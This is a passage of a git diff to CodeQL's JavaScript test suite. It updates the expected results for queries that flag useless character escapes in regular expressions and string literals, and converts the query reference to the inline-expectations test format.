\\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. 
| +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected index f7badbcbd86a..8bd58ce20b93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected 
@@ -1,43 +1,43 @@ -| tst-escapes.js:13:11:13:12 | '\\b' is a backspace, and not a word-boundary assertion | The escape sequence '\\b' is a backspace, and not a word-boundary assertion when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:13:13:14 | '\\c' is equivalent to just 'c', so the sequence is not a character class | The escape sequence '\\c' is equivalent to just 'c', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:15:13:16 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:29:13:30 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:39:13:40 | '\\p' is equivalent to just 'p', so the sequence is not a character class | The escape sequence '\\p' is equivalent to just 'p', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:45:13:46 | '\\s' is equivalent to just 's', so the sequence is not a character class | The escape sequence '\\s' is equivalent to just 's', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... 
\\x\\y\\z" | regular expression | -| tst-escapes.js:14:11:14:12 | '\\B' is equivalent to just 'B', so the sequence is not an assertion | The escape sequence '\\B' is equivalent to just 'B', so the sequence is not an assertion when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:15:14:16 | '\\D' is equivalent to just 'D', so the sequence is not a character class | The escape sequence '\\D' is equivalent to just 'D', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:39:14:40 | '\\P' is equivalent to just 'P', so the sequence is not a character class | The escape sequence '\\P' is equivalent to just 'P', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:45:14:46 | '\\S' is equivalent to just 'S', so the sequence is not a character class | The escape sequence '\\S' is equivalent to just 'S', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:15:11:15:12 | '\\1' is equivalent to just '1', so the sequence is not a backreference | The escape sequence '\\1' is equivalent to just '1', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:13:15:14 | '\\2' is equivalent to just '2', so the sequence is not a backreference | The escape sequence '\\2' is equivalent to just '2', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... 
\\0\\-\\=" | regular expression | -| tst-escapes.js:15:15:15:16 | '\\3' is equivalent to just '3', so the sequence is not a backreference | The escape sequence '\\3' is equivalent to just '3', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:17:15:18 | '\\4' is equivalent to just '4', so the sequence is not a backreference | The escape sequence '\\4' is equivalent to just '4', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:19:15:20 | '\\5' is equivalent to just '5', so the sequence is not a backreference | The escape sequence '\\5' is equivalent to just '5', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:21:15:22 | '\\6' is equivalent to just '6', so the sequence is not a backreference | The escape sequence '\\6' is equivalent to just '6', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:23:15:24 | '\\7' is equivalent to just '7', so the sequence is not a backreference | The escape sequence '\\7' is equivalent to just '7', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:25:15:26 | '\\8' is equivalent to just '8', so the sequence is not a backreference | The escape sequence '\\8' is equivalent to just '8', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... 
\\0\\-\\=" | regular expression | -| tst-escapes.js:15:27:15:28 | '\\9' is equivalent to just '9', so the sequence is not a backreference | The escape sequence '\\9' is equivalent to just '9', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:31:15:32 | '\\-' is equivalent to just '-', so the sequence may still represent a meta-character | The escape sequence '\\-' is equivalent to just '-', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:16:17:16:18 | '\\$' is equivalent to just '$', so the sequence may still represent a meta-character | The escape sequence '\\$' is equivalent to just '$', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:21:16:22 | '\\^' is equivalent to just '^', so the sequence may still represent a meta-character | The escape sequence '\\^' is equivalent to just '^', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:25:16:26 | '\\*' is equivalent to just '*', so the sequence may still represent a meta-character | The escape sequence '\\*' is equivalent to just '*', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:27:16:28 | '\\(' is equivalent to just '(', so the sequence may still represent a meta-character | The escape sequence '\\(' is equivalent to just '(', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... 
\\)\\_\\+" | regular expression | -| tst-escapes.js:16:29:16:30 | '\\)' is equivalent to just ')', so the sequence may still represent a meta-character | The escape sequence '\\)' is equivalent to just ')', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:33:16:34 | '\\+' is equivalent to just '+', so the sequence may still represent a meta-character | The escape sequence '\\+' is equivalent to just '+', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:17:9:17:10 | '\\[' is equivalent to just '[', so the sequence may still represent a meta-character | The escape sequence '\\[' is equivalent to just '[', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:17:11:17:12 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:17:18:17:19 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:18:9:18:10 | '\\{' is equivalent to just '{', so the sequence may still represent a meta-character | The escape sequence '\\{' is equivalent to just '{', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" 
| regular expression | -| tst-escapes.js:18:11:18:12 | '\\}' is equivalent to just '}', so the sequence may still represent a meta-character | The escape sequence '\\}' is equivalent to just '}', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:17:18:18 | '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character | The escape sequence '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:23:18:24 | '\\?' is equivalent to just '?', so the sequence may still represent a meta-character | The escape sequence '\\?' is equivalent to just '?', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:41:9:41:10 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:41:8:41:11 | "\\." | regular expression | -| tst-escapes.js:56:10:56:11 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:56:8:56:13 | "[\\.]" | regular expression | -| tst-escapes.js:57:12:57:13 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. 
| tst-escapes.js:57:8:57:17 | "a[b\\.c]d" | regular expression | -| tst-escapes.js:60:9:60:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:60:8:60:19 | `\\k\\\\k\\d\\\\d` | regular expression | -| tst-escapes.js:60:14:60:15 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:60:8:60:19 | `\\k\\\\k\\d\\\\d` | regular expression | -| tst-escapes.js:61:9:61:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:61:8:61:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | -| tst-escapes.js:61:20:61:21 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:61:8:61:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | -| tst-escapes.js:64:9:64:10 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:64:8:64:11 | "\\]" | regular expression | -| tst-escapes.js:69:13:69:14 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. 
| tst-escapes.js:69:8:69:15 | "\\\\\\\\\\]" | regular expression | -| tst-escapes.js:73:17:73:18 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:73:8:73:19 | "\\\\\\\\\\\\\\\\\\]" | regular expression | +| tst-escapes.js:11:11:11:12 | '\\b' is a backspace, and not a word-boundary assertion | The escape sequence '\\b' is a backspace, and not a word-boundary assertion when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:13:11:14 | '\\c' is equivalent to just 'c', so the sequence is not a character class | The escape sequence '\\c' is equivalent to just 'c', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:15:11:16 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:29:11:30 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:39:11:40 | '\\p' is equivalent to just 'p', so the sequence is not a character class | The escape sequence '\\p' is equivalent to just 'p', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... 
\\x\\y\\z" | regular expression | +| tst-escapes.js:11:45:11:46 | '\\s' is equivalent to just 's', so the sequence is not a character class | The escape sequence '\\s' is equivalent to just 's', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:12:11:12:12 | '\\B' is equivalent to just 'B', so the sequence is not an assertion | The escape sequence '\\B' is equivalent to just 'B', so the sequence is not an assertion when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:15:12:16 | '\\D' is equivalent to just 'D', so the sequence is not a character class | The escape sequence '\\D' is equivalent to just 'D', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:39:12:40 | '\\P' is equivalent to just 'P', so the sequence is not a character class | The escape sequence '\\P' is equivalent to just 'P', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:45:12:46 | '\\S' is equivalent to just 'S', so the sequence is not a character class | The escape sequence '\\S' is equivalent to just 'S', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:13:11:13:12 | '\\1' is equivalent to just '1', so the sequence is not a backreference | The escape sequence '\\1' is equivalent to just '1', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... 
\\0\\-\\=" | regular expression | +| tst-escapes.js:13:13:13:14 | '\\2' is equivalent to just '2', so the sequence is not a backreference | The escape sequence '\\2' is equivalent to just '2', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:15:13:16 | '\\3' is equivalent to just '3', so the sequence is not a backreference | The escape sequence '\\3' is equivalent to just '3', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:17:13:18 | '\\4' is equivalent to just '4', so the sequence is not a backreference | The escape sequence '\\4' is equivalent to just '4', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:19:13:20 | '\\5' is equivalent to just '5', so the sequence is not a backreference | The escape sequence '\\5' is equivalent to just '5', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:21:13:22 | '\\6' is equivalent to just '6', so the sequence is not a backreference | The escape sequence '\\6' is equivalent to just '6', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:23:13:24 | '\\7' is equivalent to just '7', so the sequence is not a backreference | The escape sequence '\\7' is equivalent to just '7', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... 
\\0\\-\\=" | regular expression | +| tst-escapes.js:13:25:13:26 | '\\8' is equivalent to just '8', so the sequence is not a backreference | The escape sequence '\\8' is equivalent to just '8', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:27:13:28 | '\\9' is equivalent to just '9', so the sequence is not a backreference | The escape sequence '\\9' is equivalent to just '9', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:31:13:32 | '\\-' is equivalent to just '-', so the sequence may still represent a meta-character | The escape sequence '\\-' is equivalent to just '-', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:14:17:14:18 | '\\$' is equivalent to just '$', so the sequence may still represent a meta-character | The escape sequence '\\$' is equivalent to just '$', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:21:14:22 | '\\^' is equivalent to just '^', so the sequence may still represent a meta-character | The escape sequence '\\^' is equivalent to just '^', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:25:14:26 | '\\*' is equivalent to just '*', so the sequence may still represent a meta-character | The escape sequence '\\*' is equivalent to just '*', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... 
\\)\\_\\+" | regular expression | +| tst-escapes.js:14:27:14:28 | '\\(' is equivalent to just '(', so the sequence may still represent a meta-character | The escape sequence '\\(' is equivalent to just '(', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:29:14:30 | '\\)' is equivalent to just ')', so the sequence may still represent a meta-character | The escape sequence '\\)' is equivalent to just ')', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:33:14:34 | '\\+' is equivalent to just '+', so the sequence may still represent a meta-character | The escape sequence '\\+' is equivalent to just '+', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:15:9:15:10 | '\\[' is equivalent to just '[', so the sequence may still represent a meta-character | The escape sequence '\\[' is equivalent to just '[', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:15:11:15:12 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:15:18:15:19 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. 
| tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:16:9:16:10 | '\\{' is equivalent to just '{', so the sequence may still represent a meta-character | The escape sequence '\\{' is equivalent to just '{', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:11:16:12 | '\\}' is equivalent to just '}', so the sequence may still represent a meta-character | The escape sequence '\\}' is equivalent to just '}', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:17:16:18 | '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character | The escape sequence '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:23:16:24 | '\\?' is equivalent to just '?', so the sequence may still represent a meta-character | The escape sequence '\\?' is equivalent to just '?', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:39:9:39:10 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:39:8:39:11 | "\\." | regular expression | +| tst-escapes.js:54:10:54:11 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. 
| tst-escapes.js:54:8:54:13 | "[\\.]" | regular expression | +| tst-escapes.js:55:12:55:13 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:55:8:55:17 | "a[b\\.c]d" | regular expression | +| tst-escapes.js:58:9:58:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:58:8:58:19 | `\\k\\\\k\\d\\\\d` | regular expression | +| tst-escapes.js:58:14:58:15 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:58:8:58:19 | `\\k\\\\k\\d\\\\d` | regular expression | +| tst-escapes.js:59:9:59:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:59:8:59:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | +| tst-escapes.js:59:20:59:21 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:59:8:59:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | +| tst-escapes.js:62:9:62:10 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. 
| tst-escapes.js:62:8:62:11 | "\\]" | regular expression | +| tst-escapes.js:67:13:67:14 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:67:8:67:15 | "\\\\\\\\\\]" | regular expression | +| tst-escapes.js:71:17:71:18 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:71:8:71:19 | "\\\\\\\\\\\\\\\\\\]" | regular expression | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref index 57187b21edf7..6898c59b4d29 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref @@ -1 +1,2 @@ -Security/CWE-020/UselessRegExpCharacterEscape.ql \ No newline at end of file +query: Security/CWE-020/UselessRegExpCharacterEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 4e2dcd674e79..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); 
